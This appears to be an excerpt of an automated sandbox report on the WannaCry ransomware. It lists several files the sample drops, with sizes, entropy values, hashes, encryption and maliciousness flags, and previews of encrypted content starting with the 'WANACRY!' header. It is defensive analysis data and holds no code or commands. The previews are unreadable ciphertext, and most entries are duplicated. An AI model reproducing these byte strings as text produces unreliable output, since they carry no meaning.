                                                                              Preview:WANACRY!....~.au.3i..P#.J>...........*i....]-.@m...R.0|qp{...68..72.q0[0.)....~..'.P9U......t.(o"....D..\.c..z.YQM...(.oj.......:.T2.m[H:.]"(.M....G...R..y.PDq..Gd..1....O.!w.a....f.TJZ.L>...tF.....U.5....=[)..s..jnF......VC...x;^..a...S.u..c....:....?......d.Fz.............*pc..FY....X...].....y.w....((...?....&....'.U.K.+..p.B.y.......>v......:?-.oaB.+.....k...~.d...B.Na..Pe....[(Gns?z+Rh=..S..n...)...zT8(8.l.......j.eQ.}...C,......_.....}j..i.@-..N.aE9.p.....*.......L.........K.C..\...*SW.5Q...&.PF.7u..\.d..c.X......Z..I.,....6.....+.C....S,..5.W.6.)b.T...:..?.8.Y...S.}..1...b..7..u3N.dk....O.....5...dc.....d.@..w.&...IiH....J.U8.....W-............7e..|U.....{..]".(...2VM...nZ..v..\..g.....x..H..%K...{3V...LJz4...G.^..?Q.R.I.Of.-...U...[...kI...+.4f.3.....m.....R.%.<.p?Cw#.3...}...P..AW......~.U.^<..8p.Y..j...+...x........"1.g.}....I.MD..c..u1.o.k.S.oHC.......<.|.C!A6..7....%|...d.S..5/9.5.X .c....'G..\-D..v?x.a'.............&0..O...5*,2.
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):2296
                                                                              Entropy (8bit):7.905666877334874
                                                                              Encrypted:false
                                                                              SSDEEP:48:bkf9HvhtCGyKqCKDfvh75ny2a+Vn14YkdGQskQSgxFXZjKQOb9Ab0o0RbOYZi:oVuGydfphVaA14YQrQXXZ+1Ab0zhi
                                                                              MD5:763EAA3927A2B0002F98E802919B1415
                                                                              SHA1:66ACA36BC69B161BC5292FD306A4421952B8BA95
                                                                              SHA-256:EE857E8CE5E794DC62FC02A0CE360EAE48EA7BCB8E4DE46060E287370A5EA8CE
                                                                              SHA-512:6244F59D9F3126030A9F26258CC69E0F9900B69BA2BC649F5F1EE4A891BA8438F162502AAA2A15AC3A013BC09157BB485E438E955093858FCCDC3E198049A7B4
                                                                              Malicious:false
                                                                              Preview:WANACRY!....~.au.3i..P#.J>...........*i....]-.@m...R.0|qp{...68..72.q0[0.)....~..'.P9U......t.(o"....D..\.c..z.YQM...(.oj.......:.T2.m[H:.]"(.M....G...R..y.PDq..Gd..1....O.!w.a....f.TJZ.L>...tF.....U.5....=[)..s..jnF......VC...x;^..a...S.u..c....:....?......d.Fz.............*pc..FY....X...].....y.w....((...?....&....'.U.K.+..p.B.y.......>v......:?-.oaB.+.....k...~.d...B.Na..Pe....[(Gns?z+Rh=..S..n...)...zT8(8.l.......j.eQ.}...C,......_.....}j..i.@-..N.aE9.p.....*.......L.........K.C..\...*SW.5Q...&.PF.7u..\.d..c.X......Z..I.,....6.....+.C....S,..5.W.6.)b.T...:..?.8.Y...S.}..1...b..7..u3N.dk....O.....5...dc.....d.@..w.&...IiH....J.U8.....W-............7e..|U.....{..]".(...2VM...nZ..v..\..g.....x..H..%K...{3V...LJz4...G.^..?Q.R.I.Of.-...U...[...kI...+.4f.3.....m.....R.%.<.p?Cw#.3...}...P..AW......~.U.^<..8p.Y..j...+...x........"1.g.}....I.MD..c..u1.o.k.S.oHC.......<.|.C!A6..7....%|...d.S..5/9.5.X .c....'G..\-D..v?x.a'.............&0..O...5*,2.
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):121496
                                                                              Entropy (8bit):7.998611207609077
                                                                              Encrypted:true
                                                                              SSDEEP:3072:C+vnRirMBz8bn0ZI8ztSJLvWYnYB2h7dVetuo0IMDO:CwRbNmn0ZPGZnYB2FfettMDO
                                                                              MD5:D2AAA9BD36F73FC62DC2253AF8ED6FBD
                                                                              SHA1:133C53F569CCC1D6040FBBD0C0021CC1F9ABA1C6
                                                                              SHA-256:29BC27F1A2BA6855FF15E9F6A83CDC9C90FFEDDC7E70C4BFD6AFDC9A8B1DE202
                                                                              SHA-512:AA66664A1F18BD7738336C961A3683CC066495C8CDAAFC8A6AF320B647F9EB884E72973775FD957DE1F3B63C3FCA623A540A5C0D73854C9A2566D1159F31A556
                                                                              Malicious:true
                                                                              Preview:WANACRY!.....4......u"..9Uo$.o.......V....lx....8D...1 e0.C.1.}4PA.........z..d..p...w{....3....p.Q\..{.......W.o..2.-(...9>.C.....G...3.G.4...C.~..D...<x..oc.ad.Qw.9}"+Y..>..3.2[&...dZ.s..~)-c.\....T..8Z.O...<.}!....."4O..v.[.e...l...Kh..U.@.`......o+2l........~...........`..W..oF .x..K...4..}{IXs..F.c.8p|.OO.z....AF.d.6..n'............*....O....M....Y.......T.9..0'e.S....N........QW...D........D.k..."........p1.......L.../Q..r..!9...k..b=.]+.&..F].)t....J..Y.....hj.W.T.........]...\..4.igY..9.h......a..}...........!.B...V..Ew. .j.C....Wff....2....}..~..{.#_..>.)^....z..../Z/..V..]2P$7A..:.S.lYmd .("...!X.,.w.8.X47..h...a.wN...z2.(..t?Q.d.h......b.{..JO.DRK.....^Z....j..*.*........\.p#.0..|.Sc%..Mr.....k...)N.@vcZ.......R...l...?....<.N...=X..Q.......u...n..,l>..6.....?.)k/V.w_.^.<;.v[{.V.5..5..EaKZK|l3......O.].?*V..:$.Q.........-.S.x......../..O._q..J. ,........5s...w....,.M..K.n..I|..i...OX...?...c..F..7:..{1uR#..R..!..Sv].`#.L...,x
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):121496
                                                                              Entropy (8bit):7.998611207609077
                                                                              Encrypted:true
                                                                              SSDEEP:3072:C+vnRirMBz8bn0ZI8ztSJLvWYnYB2h7dVetuo0IMDO:CwRbNmn0ZPGZnYB2FfettMDO
                                                                              MD5:D2AAA9BD36F73FC62DC2253AF8ED6FBD
                                                                              SHA1:133C53F569CCC1D6040FBBD0C0021CC1F9ABA1C6
                                                                              SHA-256:29BC27F1A2BA6855FF15E9F6A83CDC9C90FFEDDC7E70C4BFD6AFDC9A8B1DE202
                                                                              SHA-512:AA66664A1F18BD7738336C961A3683CC066495C8CDAAFC8A6AF320B647F9EB884E72973775FD957DE1F3B63C3FCA623A540A5C0D73854C9A2566D1159F31A556
                                                                              Malicious:true
                                                                              Preview:WANACRY!.....4......u"..9Uo$.o.......V....lx....8D...1 e0.C.1.}4PA.........z..d..p...w{....3....p.Q\..{.......W.o..2.-(...9>.C.....G...3.G.4...C.~..D...<x..oc.ad.Qw.9}"+Y..>..3.2[&...dZ.s..~)-c.\....T..8Z.O...<.}!....."4O..v.[.e...l...Kh..U.@.`......o+2l........~...........`..W..oF .x..K...4..}{IXs..F.c.8p|.OO.z....AF.d.6..n'............*....O....M....Y.......T.9..0'e.S....N........QW...D........D.k..."........p1.......L.../Q..r..!9...k..b=.]+.&..F].)t....J..Y.....hj.W.T.........]...\..4.igY..9.h......a..}...........!.B...V..Ew. .j.C....Wff....2....}..~..{.#_..>.)^....z..../Z/..V..]2P$7A..:.S.lYmd .("...!X.,.w.8.X47..h...a.wN...z2.(..t?Q.d.h......b.{..JO.DRK.....^Z....j..*.*........\.p#.0..|.Sc%..Mr.....k...)N.@vcZ.......R...l...?....<.N...=X..Q.......u...n..,l>..6.....?.)k/V.w_.^.<;.v[{.V.5..5..EaKZK|l3......O.].?*V..:$.Q.........-.S.x......../..O._q..J. ,........5s...w....,.M..K.n..I|..i...OX...?...c..F..7:..{1uR#..R..!..Sv].`#.L...,x
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):4024
                                                                              Entropy (8bit):7.956331020159195
                                                                              Encrypted:false
                                                                              SSDEEP:96:o9Yxma/Qscvq9xCY3MQatgCcbCrTJZuCCqkbII5:akmIQ3HYotgrbwnupaI5
                                                                              MD5:C6B24EFEDC676DA9357A8E10DF5095E8
                                                                              SHA1:6FC69D7BA0A56F434989C35180CA62E6AD28E0B1
                                                                              SHA-256:81BC04838BF491262FF012175A3529B8862376A1B55D06E0A7C8D7F07625FDF2
                                                                              SHA-512:6364F9A95092C876A88698DA15BCF09D989EC677E61DDD8BC33B08DD0BA8D12836FF49CD2B4CA7F88CCC6313D727959CB4F8540796D21B5DCB59B650A9DEA4E6
                                                                              Malicious:false
                                                                              Preview:WANACRY!....}..".i.....c.h.1..#..O.c....*..P.\.........D.u...v..-..` l......i6........`g...C.P.L;..c).jM.%.W3.Q...T.N....-.......@\.%.|Y5......h..Q.[....}..X...Qh'...v.2.Cmj.4.6\u..p..>.7R...G.A.l....+MR.2....r.. {..Qs^.JJ3..\$.Ut.er.rg...1.c$.;7.07..8.u.............sp..B.N.9Cd.r...<{}...7....1y.&.R...Asr.%"...AOL"...+(7..i1.-4...<.$O'...e...L.(.H9C0.G(7E...5.....2kh.ok...A..Ky~...v.e..dc[K.B.....h.i...f&I.#| ..X..`C..*x..u..'.b.~.~%....\K.(..85.._B.[..FPGX.+......C~.2*.4..G.!.....L.d..t...=......n^.......5.../;..\.......M.../G.......oy......CG.e....*+...%..!O.d.l).*c^..3.R....ska.'jR..%w.....es..r...y..d?.R...........7;}..7.{.g....Qz.k....,..'Nd....K ..AZ..GUUI..~|$8...x..d..Z..Ul.0.......4.i.i2...-......L.....l.B.}4..&..y.P.".w......$..t=..b.../*,.r.....$....It^.;.^$f..'...%.....v9n...Az.. m.:.G....z.....x..$.M!..#.....L..]5.YK.*...R./..b..@.....3..#@V.m.sg....R.b.\..t.a'.Ld .@.....q.ub.V-....{.$Ki.]...t)r..t.5)O.g...0.U..x.v.y..]
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):4024
                                                                              Entropy (8bit):7.956331020159195
                                                                              Encrypted:false
                                                                              SSDEEP:96:o9Yxma/Qscvq9xCY3MQatgCcbCrTJZuCCqkbII5:akmIQ3HYotgrbwnupaI5
                                                                              MD5:C6B24EFEDC676DA9357A8E10DF5095E8
                                                                              SHA1:6FC69D7BA0A56F434989C35180CA62E6AD28E0B1
                                                                              SHA-256:81BC04838BF491262FF012175A3529B8862376A1B55D06E0A7C8D7F07625FDF2
                                                                              SHA-512:6364F9A95092C876A88698DA15BCF09D989EC677E61DDD8BC33B08DD0BA8D12836FF49CD2B4CA7F88CCC6313D727959CB4F8540796D21B5DCB59B650A9DEA4E6
                                                                              Malicious:false
                                                                              Preview:WANACRY!....}..".i.....c.h.1..#..O.c....*..P.\.........D.u...v..-..` l......i6........`g...C.P.L;..c).jM.%.W3.Q...T.N....-.......@\.%.|Y5......h..Q.[....}..X...Qh'...v.2.Cmj.4.6\u..p..>.7R...G.A.l....+MR.2....r.. {..Qs^.JJ3..\$.Ut.er.rg...1.c$.;7.07..8.u.............sp..B.N.9Cd.r...<{}...7....1y.&.R...Asr.%"...AOL"...+(7..i1.-4...<.$O'...e...L.(.H9C0.G(7E...5.....2kh.ok...A..Ky~...v.e..dc[K.B.....h.i...f&I.#| ..X..`C..*x..u..'.b.~.~%....\K.(..85.._B.[..FPGX.+......C~.2*.4..G.!.....L.d..t...=......n^.......5.../;..\.......M.../G.......oy......CG.e....*+...%..!O.d.l).*c^..3.R....ska.'jR..%w.....es..r...y..d?.R...........7;}..7.{.g....Qz.k....,..'Nd....K ..AZ..GUUI..~|$8...x..d..Z..Ul.0.......4.i.i2...-......L.....l.B.}4..&..y.P.".w......$..t=..b.../*,.r.....$....It^.;.^$f..'...%.....v9n...Az.. m.:.G....z.....x..$.M!..#.....L..]5.YK.*...R./..b..@.....3..#@V.m.sg....R.b.\..t.a'.Ld .@.....q.ub.V-....{.$Ki.]...t)r..t.5)O.g...0.U..x.v.y..]
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1752
                                                                              Entropy (8bit):7.8771455018553835
                                                                              Encrypted:false
                                                                              SSDEEP:48:bkPY5kOK/6LU1e67N8moGSjmiQURN705UBulTNabDW:oPDo60NHQU77OiDW
                                                                              MD5:3CFE6CBDB237EEE60E154C7471058B04
                                                                              SHA1:3EC795AD819317FB79528A8451B34FB19C20BCE8
                                                                              SHA-256:5A0045C24B3AD6D9C4D7DDDB80375895477DC19FF40B4799818FFCB9B0EA74B1
                                                                              SHA-512:188F34410D10433D6020EE5DD302993BB56C65C8D2F393E9B764E396F048542F9B10832EEDAB2FB005A68D28671E0779E77EDBE9D427A9A4C461E91647F308AB
                                                                              Malicious:false
                                                                              Preview:WANACRY!..........6.Q...}...S.......W.:.G0...X1.F.|w.e.-...............\.T.t....(.......:.g.....7..&..&m.....3o.... ..0'..E.=.t..r..r...,%O.1y..a(...k.NX.-.en^{.....q..HQ.aL...bRb.+s.8Z#9....r.....Yo?..:..`!./....z.e-.Z..n]..>gI.\'......@.gll.l..C7H.o.z.A...&................+w.....8p.!TL....e.f.W....>Vp.'.s....?..wY......;.m&u..c...G..p._.G.`.[QD.xe.i..s[......c.. t......-...i...Q.~.!?.3<.a..a.A.Sh....3.&vJ.>...2@o...LJ.F....7...dR.W.!MH.@.Kv8"N~=...F......|0./..`af....'&.0....MlA.j....=F.*..ILcE.4....P..@..7.../{.Y..X.Wo`+.t}...)7\@...z..pX.W.y..=."...........x..(....'].../..:{<......%...d..7..&.\|....F......[..v...&.G...t.....7QE.E...1.....~...*.....Hh..YMe.Oo.5n.....'.g.I.).^..v.9...(.'.).O....GW.^..o/.......j%.G;5......X.fc..c.P}.R...(z.r4../..F.?S..=....mW..7..u*.c.....X.TCD.|..k$p.S.k...........Fo..k.`.;...+.t3s.C.#...@...=.[...CP..MaX.......f...W|...f.....\o...:..-...qv...E......LE....^k.4...,W>%..H1/..#.jW#.1....'.ks...."..,.!...-Z.4
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1752
                                                                              Entropy (8bit):7.8771455018553835
                                                                              Encrypted:false
                                                                              SSDEEP:48:bkPY5kOK/6LU1e67N8moGSjmiQURN705UBulTNabDW:oPDo60NHQU77OiDW
                                                                              MD5:3CFE6CBDB237EEE60E154C7471058B04
                                                                              SHA1:3EC795AD819317FB79528A8451B34FB19C20BCE8
                                                                              SHA-256:5A0045C24B3AD6D9C4D7DDDB80375895477DC19FF40B4799818FFCB9B0EA74B1
                                                                              SHA-512:188F34410D10433D6020EE5DD302993BB56C65C8D2F393E9B764E396F048542F9B10832EEDAB2FB005A68D28671E0779E77EDBE9D427A9A4C461E91647F308AB
                                                                              Malicious:false
                                                                              Preview:WANACRY!..........6.Q...}...S.......W.:.G0...X1.F.|w.e.-...............\.T.t....(.......:.g.....7..&..&m.....3o.... ..0'..E.=.t..r..r...,%O.1y..a(...k.NX.-.en^{.....q..HQ.aL...bRb.+s.8Z#9....r.....Yo?..:..`!./....z.e-.Z..n]..>gI.\'......@.gll.l..C7H.o.z.A...&................+w.....8p.!TL....e.f.W....>Vp.'.s....?..wY......;.m&u..c...G..p._.G.`.[QD.xe.i..s[......c.. t......-...i...Q.~.!?.3<.a..a.A.Sh....3.&vJ.>...2@o...LJ.F....7...dR.W.!MH.@.Kv8"N~=...F......|0./..`af....'&.0....MlA.j....=F.*..ILcE.4....P..@..7.../{.Y..X.Wo`+.t}...)7\@...z..pX.W.y..=."...........x..(....'].../..:{<......%...d..7..&.\|....F......[..v...&.G...t.....7QE.E...1.....~...*.....Hh..YMe.Oo.5n.....'.g.I.).^..v.9...(.'.).O....GW.^..o/.......j%.G;5......X.fc..c.P}.R...(z.r4../..F.?S..=....mW..7..u*.c.....X.TCD.|..k$p.S.k...........Fo..k.`.;...+.t3s.C.#...@...=.[...CP..MaX.......f...W|...f.....\o...:..-...qv...E......LE....^k.4...,W>%..H1/..#.jW#.1....'.ks...."..,.!...-Z.4
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):45208
                                                                              Entropy (8bit):7.996031724293822
                                                                              Encrypted:true
                                                                              SSDEEP:768:GU0n5DH6bK7gmOAfUr0bR/up45FCs8d/dPrdU4nHZlCl+NEakcyXNwN1LA:mnBu63OAfAmR/0s8d/dDmyZK+NEahyXN
                                                                              MD5:E0ED76639A62C86C7B1AF2F06A2D6375
                                                                              SHA1:9AC6AAA427C29FDD81A2ABB5BB7C190B00463A90
                                                                              SHA-256:EF5BC38A9A4352DF76C7B4693F11021A83B546CC54874A91F9E90EA8922A223A
                                                                              SHA-512:04A07AD87E3344206480BC62FB92A6621BAA3E85458990CDBE9130DE3F53901152A4B5C385270AC1F85A75F24D05FE52AAEB458F34CCF24DF2F1C0EE8714BA93
                                                                              Malicious:true
                                                                              Preview:WANACRY!....mi.?.f.s.G....Y..b4Q......:...Ts.a....-\..e0o.......9..8.r.S.J....#......t8\...<R'my..PM'.c.H.$J...s...>z..W^._.......J..x......Il..]PWi@..~FC5......*.x!.A...N<.>M.....5Y.W1.B}HK..ff.1..|.:..H..A....kx.....s..$.e.ze..&......Qhe>.P\K@..!...L......}........J.H.J3~.o..S.....g..f@;R<.j92K*...#....`....9.GL....`.....8.p....f'.....u@.........[...JjbqJ.b.n..U.4.y......y..jT.w..vh...g>VQ..}}e(.l....,...;.m../iQ..16.&.A.'.I.C,@.{...*z.Z..M..R.[...B..)..(..c...*.!Tk.OeT/...4..:jy.h..#..IUY%B....B.).B.F........Sa$......p.a[6.M..W........-.!..mf...j..j\.[.....v.5.......y..,.Z,...j.D.'........a[7....WGG...T..[..B.o$..Y4.7..?.`..r.x.1D.s...".7.`|.6U..=.M...#.I.t`f..0...z........5Y.)..%...E.....GZ.C*...L...c.K...b..!:[.g./.O3.2.U..g.4....N.-.x.r-.x>......4.E;..g....mXb...^nJ.....D.......80....t.E.9.6 ............T.(1...(....8.....;@ ...!.I..?...S.........:1..|..!..Y..S]...5.7.5.|M....YR.RP..,...~V%..Q..u..+m..q...3.G....J..@..S8..`..q....bS@.
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):45208
                                                                              Entropy (8bit):7.996031724293822
                                                                              Encrypted:true
                                                                              SSDEEP:768:GU0n5DH6bK7gmOAfUr0bR/up45FCs8d/dPrdU4nHZlCl+NEakcyXNwN1LA:mnBu63OAfAmR/0s8d/dDmyZK+NEahyXN
                                                                              MD5:E0ED76639A62C86C7B1AF2F06A2D6375
                                                                              SHA1:9AC6AAA427C29FDD81A2ABB5BB7C190B00463A90
                                                                              SHA-256:EF5BC38A9A4352DF76C7B4693F11021A83B546CC54874A91F9E90EA8922A223A
                                                                              SHA-512:04A07AD87E3344206480BC62FB92A6621BAA3E85458990CDBE9130DE3F53901152A4B5C385270AC1F85A75F24D05FE52AAEB458F34CCF24DF2F1C0EE8714BA93
                                                                              Malicious:true
                                                                              Preview:WANACRY!....mi.?.f.s.G....Y..b4Q......:...Ts.a....-\..e0o.......9..8.r.S.J....#......t8\...<R'my..PM'.c.H.$J...s...>z..W^._.......J..x......Il..]PWi@..~FC5......*.x!.A...N<.>M.....5Y.W1.B}HK..ff.1..|.:..H..A....kx.....s..$.e.ze..&......Qhe>.P\K@..!...L......}........J.H.J3~.o..S.....g..f@;R<.j92K*...#....`....9.GL....`.....8.p....f'.....u@.........[...JjbqJ.b.n..U.4.y......y..jT.w..vh...g>VQ..}}e(.l....,...;.m../iQ..16.&.A.'.I.C,@.{...*z.Z..M..R.[...B..)..(..c...*.!Tk.OeT/...4..:jy.h..#..IUY%B....B.).B.F........Sa$......p.a[6.M..W........-.!..mf...j..j\.[.....v.5.......y..,.Z,...j.D.'........a[7....WGG...T..[..B.o$..Y4.7..?.`..r.x.1D.s...".7.`|.6U..=.M...#.I.t`f..0...z........5Y.)..%...E.....GZ.C*...L...c.K...b..!:[.g./.O3.2.U..g.4....N.-.x.r-.x>......4.E;..g....mXb...^nJ.....D.......80....t.E.9.6 ............T.(1...(....8.....;@ ...!.I..?...S.........:1..|..!..Y..S]...5.7.5.|M....YR.RP..,...~V%..Q..u..+m..q...3.G....J..@..S8..`..q....bS@.
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):2184
                                                                              Entropy (8bit):7.931104215946018
                                                                              Encrypted:false
                                                                              SSDEEP:48:bkPdcclwcq1CPWtplu9O71HqpP4nrwrWtSP33DQe4Xl:oPdccoQYpH1HqpPir0jd4Xl
                                                                              MD5:5161621D944AEB51FA66AC5C93DB038E
                                                                              SHA1:E8AFCC65A374C16201F8D15461F315B831BB7163
                                                                              SHA-256:CC814DAB45F9F9937554FC69DF212300665FF40BA2E1880E5481FD8C73432BA8
                                                                              SHA-512:BAFE5418295802D1EF07F8494BA4CF67123E26036293686D1AD66F0B8396BD5D56F2EFE93FE28313DE7F7F6C6113786B4D67D9B7B17216637374E80742214176
                                                                              Malicious:false
                                                                              Preview:WANACRY!.....3... ....G.....,S..e\.t......E..6k.M..e.....iBb....>.8.7.(..M../4.^.$P...M:.\.;..........j.u..Nd..V%fa....R.n... ..S.kp.'....^J..DD.0.ZdH..W<....1z8B...to.=....Z.ds9X.....N.u.T3.....m..yG..m.!.8.O8.r:9[[.5...r...f|....vL...;...=.Y...]..b..".....b........P.?.W.I..N.).H8Ep...&..r.3..C-.P.0..-.07...:..v.x\L..D.f...9.F2....A.......K.7.q....m..>...."K.\w.D~.E^4.j.>u.`..p3..<.g^.S..Pp..zt...T....bf..+....'.r..H. Y......R}..!..FV0G...N.k).....u.U.R.C.......<...Y...~(z. .u..`E.p.....R...}...L!JY......L.>9..4...n5$..;....RN....Q3...O.``uX..z....`.......#Y]#m..@...k..<&F.o..7PWq..h.R....,...f...... g9.c..+.0u%k^uPd.9.%8k.n..{Q...n...... @.W."...8...U-ux.Bj..Uf.....g.5.s.t:..OD.%j...B7+1)=z.dM....^....'.0s0..?...k.......l.....${9Uy..q.6|....W.b..:...e.kc.y.Y.............).;......./nL..P.....C..=..r.AJ..z(d....._`T....D).R.)S..v.]..5P.........'.g.......M... .h.0.L.>.|...~..A.Z.oi..........i..HO.v.....M.3.;.......|..B.quc....G.R:B..
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):2184
                                                                              Entropy (8bit):7.931104215946018
                                                                              Encrypted:false
                                                                              SSDEEP:48:bkPdcclwcq1CPWtplu9O71HqpP4nrwrWtSP33DQe4Xl:oPdccoQYpH1HqpPir0jd4Xl
                                                                              MD5:5161621D944AEB51FA66AC5C93DB038E
                                                                              SHA1:E8AFCC65A374C16201F8D15461F315B831BB7163
                                                                              SHA-256:CC814DAB45F9F9937554FC69DF212300665FF40BA2E1880E5481FD8C73432BA8
                                                                              SHA-512:BAFE5418295802D1EF07F8494BA4CF67123E26036293686D1AD66F0B8396BD5D56F2EFE93FE28313DE7F7F6C6113786B4D67D9B7B17216637374E80742214176
                                                                              Malicious:false
                                                                              Preview:WANACRY!.....3... ....G.....,S..e\.t......E..6k.M..e.....iBb....>.8.7.(..M../4.^.$P...M:.\.;..........j.u..Nd..V%fa....R.n... ..S.kp.'....^J..DD.0.ZdH..W<....1z8B...to.=....Z.ds9X.....N.u.T3.....m..yG..m.!.8.O8.r:9[[.5...r...f|....vL...;...=.Y...]..b..".....b........P.?.W.I..N.).H8Ep...&..r.3..C-.P.0..-.07...:..v.x\L..D.f...9.F2....A.......K.7.q....m..>...."K.\w.D~.E^4.j.>u.`..p3..<.g^.S..Pp..zt...T....bf..+....'.r..H. Y......R}..!..FV0G...N.k).....u.U.R.C.......<...Y...~(z. .u..`E.p.....R...}...L!JY......L.>9..4...n5$..;....RN....Q3...O.``uX..z....`.......#Y]#m..@...k..<&F.o..7PWq..h.R....,...f...... g9.c..+.0u%k^uPd.9.%8k.n..{Q...n...... @.W."...8...U-ux.Bj..Uf.....g.5.s.t:..OD.%j...B7+1)=z.dM....^....'.0s0..?...k.......l.....${9Uy..q.6|....W.b..:...e.kc.y.Y.............).;......./nL..P.....C..=..r.AJ..z(d....._`T....D).R.)S..v.]..5P.........'.g.......M... .h.0.L.>.|...~..A.Z.oi..........i..HO.v.....M.3.;.......|..B.quc....G.R:B..
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):71000
                                                                              Entropy (8bit):7.997453944414412
                                                                              Encrypted:true
                                                                              SSDEEP:1536:ha+BsWSBwsnn90f2gUZBrZ0Hcp83LWrBINi0fNfRdkIlU9KY1dt2:hFeTBwxULrCHc2AOiy5tmKYo
                                                                              MD5:4BD11EF7243892379BD8B90B53B064BF
                                                                              SHA1:4EE3BED08E3523B77842244FAA85F334C74A8488
                                                                              SHA-256:B907A28522BF8C600968809D8B81781081D43AC0DAFC39FA3EC7118BB01CC403
                                                                              SHA-512:A575483514650F38F2241155BEC3CCD5108B6B978D6DA87A2FD41D0CD1E62AA1FC01024B30BADF3465547DD5589CBC0C17E23F2719BC438FFCBBD0430C713C26
                                                                              Malicious:true
                                                                              Preview:WANACRY!.....9<m.u.S!.0....9..y.t..eLpoLG.......O...*.. f.Cu.KT.;D!^.2r......Z._.\.P...9O...d...vaW...irW<. ....v.....g.qf...F.d.... kv!A.&1.u.2:.~-.H..P...q4:h.<e........4..J.b..x,.M.5.....w.Q.L.xX..\X.........j` .DXT...+e.' ..to.EfEV.j...)9..JW..@K..|.....;........\...2....#.}..M..[X..$[...k..F..\p...Jl...?..mM8q.j....0.h..I..AN....qc.....l.X8...7.;.H.x. e....|...&..r..Y...r..'.1U..1../.+].......~........3DTC.l..B....t.+..L...2.1......pd3?....A~<....67Y.]..j....p.... ....606.*..;.v.W..M.").a.@c,.MW..a.*.......E.p......%.....)../.d.......@j...D.*.C...P...N1.r...*...e.oq...{e... .X....*..U\.....T.;.%h..l..K*....d.....#.R.7...Cd..tF4?.%.7F.{.~.......GC.......1.C.D~7...=O.,`....O%np..~....T..]U(;v...^-.....To$..8)....X7...0nm.z...5.t...k.............../..n.i..[J.h......ojJ.v......&o.D..4...m.../"._.9+...".N.b.+.~G..'..C2.;...=..t..%....../.h.L.=.I%iX?os.*.W].[.._.T.6.c...{#z.cEu.....A?O..t.Z./..8..Fv.X.S..o.o8...Zu...VH......q..7....KM
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):71000
                                                                              Entropy (8bit):7.997453944414412
                                                                              Encrypted:true
                                                                              SSDEEP:1536:ha+BsWSBwsnn90f2gUZBrZ0Hcp83LWrBINi0fNfRdkIlU9KY1dt2:hFeTBwxULrCHc2AOiy5tmKYo
                                                                              MD5:4BD11EF7243892379BD8B90B53B064BF
                                                                              SHA1:4EE3BED08E3523B77842244FAA85F334C74A8488
                                                                              SHA-256:B907A28522BF8C600968809D8B81781081D43AC0DAFC39FA3EC7118BB01CC403
                                                                              SHA-512:A575483514650F38F2241155BEC3CCD5108B6B978D6DA87A2FD41D0CD1E62AA1FC01024B30BADF3465547DD5589CBC0C17E23F2719BC438FFCBBD0430C713C26
                                                                              Malicious:true
                                                                              Preview:WANACRY!.....9<m.u.S!.0....9..y.t..eLpoLG.......O...*.. f.Cu.KT.;D!^.2r......Z._.\.P...9O...d...vaW...irW<. ....v.....g.qf...F.d.... kv!A.&1.u.2:.~-.H..P...q4:h.<e........4..J.b..x,.M.5.....w.Q.L.xX..\X.........j` .DXT...+e.' ..to.EfEV.j...)9..JW..@K..|.....;........\...2....#.}..M..[X..$[...k..F..\p...Jl...?..mM8q.j....0.h..I..AN....qc.....l.X8...7.;.H.x. e....|...&..r..Y...r..'.1U..1../.+].......~........3DTC.l..B....t.+..L...2.1......pd3?....A~<....67Y.]..j....p.... ....606.*..;.v.W..M.").a.@c,.MW..a.*.......E.p......%.....)../.d.......@j...D.*.C...P...N1.r...*...e.oq...{e... .X....*..U\.....T.;.%h..l..K*....d.....#.R.7...Cd..tF4?.%.7F.{.~.......GC.......1.C.D~7...=O.,`....O%np..~....T..]U(;v...^-.....To$..8)....X7...0nm.z...5.t...k.............../..n.i..[J.h......ojJ.v......&o.D..4...m.../"._.9+...".N.b.+.~G..'..C2.;...=..t..%....../.h.L.=.I%iX?os.*.W].[.._.T.6.c...{#z.cEu.....A?O..t.Z./..8..Fv.X.S..o.o8...Zu...VH......q..7....KM
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):344344
                                                                              Entropy (8bit):7.999455231845374
                                                                              Encrypted:true
                                                                              SSDEEP:6144:VEHl28cdQusszzBtkE/ZpTOpIaHguNEZo6mmvS+4+cWYd7S5LPNQp+DbaM+nFn0i:Ql2JSIYE/ZpTOOaHgqEZo6m0S+jWELPg
                                                                              MD5:67A6F44A934D6FAEF287EA3FA75C20DC
                                                                              SHA1:6BA2A6AED3BCA0EFF88E6F750CF8D190ADDDCFB8
                                                                              SHA-256:E811A084BF7F1E2A7F82E3B394DE0FD59EA6A464012A419BF74FA7F22595CD7C
                                                                              SHA-512:802913D79DCD898D7479B4CAEF14C2286644393E6D974EA19D00D45BE685157B26CEEC6F025FEF82937A57F069BCB529AFB69E034FB7FC69E4AAE39BAAC05FCE
                                                                              Malicious:true
